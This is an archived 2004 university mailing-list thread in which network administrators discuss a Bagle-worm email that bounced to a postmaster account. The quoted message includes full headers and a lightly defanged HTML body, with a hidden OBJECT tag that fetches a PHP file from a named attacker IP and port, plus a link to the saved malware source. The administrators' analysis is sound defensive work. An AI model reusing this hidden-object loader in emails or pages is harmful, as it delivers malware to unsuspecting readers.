Print

Print


For anyone who is curious, I nabbed a copy of the 231166.php source.  Pretty
clever. I believe that the image (ezmvoyx.jpeg) is the actual virus.

http://www.msu.edu/~colepet/bagle.txt


     Peter Cole
     IT Administration
     Michigan State University Press
     517.355.9543 x106 - [log in to unmask]
     http://msupress.msu.edu




-----Original Message-----
From: MSU Network Administrators Group [mailto:[log in to unmask]]On
Behalf Of Gene Willacker
Sent: Thursday, March 18, 2004 11:55 AM
To: [log in to unmask]
Subject: [MSUNAG] Is this an example? (Re: Disabling preview pane..)


This is something that bounced back to our postmaster account this morning.

Just to be safe, in the html below, I changed OBJECT to WACKJECT and
STYLE to STOOL

The IP address it goes to is: 68.66.185.120:81
The filename is: 231166.php

------ This is a copy of the message, including all the headers. ------

Return-path: <[log in to unmask]>
Received: from ngging.user.msu.edu ([35.11.229.182] helo=coeur.net)
    by sys18.mail.msu.edu with smtp (Exim 4.24 #37)
    id 1B3oF6-0002r5-0R
    for [log in to unmask]; Wed, 17 Mar 2004 22:30:48 -0500
Date: Wed, 17 Mar 2004 22:28:35 -0500
To: [log in to unmask]
Subject: Re: Msg reply
From: [log in to unmask]
Message-ID: <[log in to unmask]>
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Virus: None found by Clam AV

<html><body>
<font face="System">
<WACKJECT  STOOL="display:none" DATA="http://nn.66.185.120:81/nnnnnn.php">
</WACKJECT></body></html>

--
*Gene Willacker*
Systems Analyst
H&FS Systems Operations Group
Michigan State University
Food Stores Building
East Lansing, MI 48824
/1-517-353-1691/

---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.624 / Virus Database: 401 - Release Date: 3/15/2004

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.634 / Virus Database: 406 - Release Date: 3/18/2004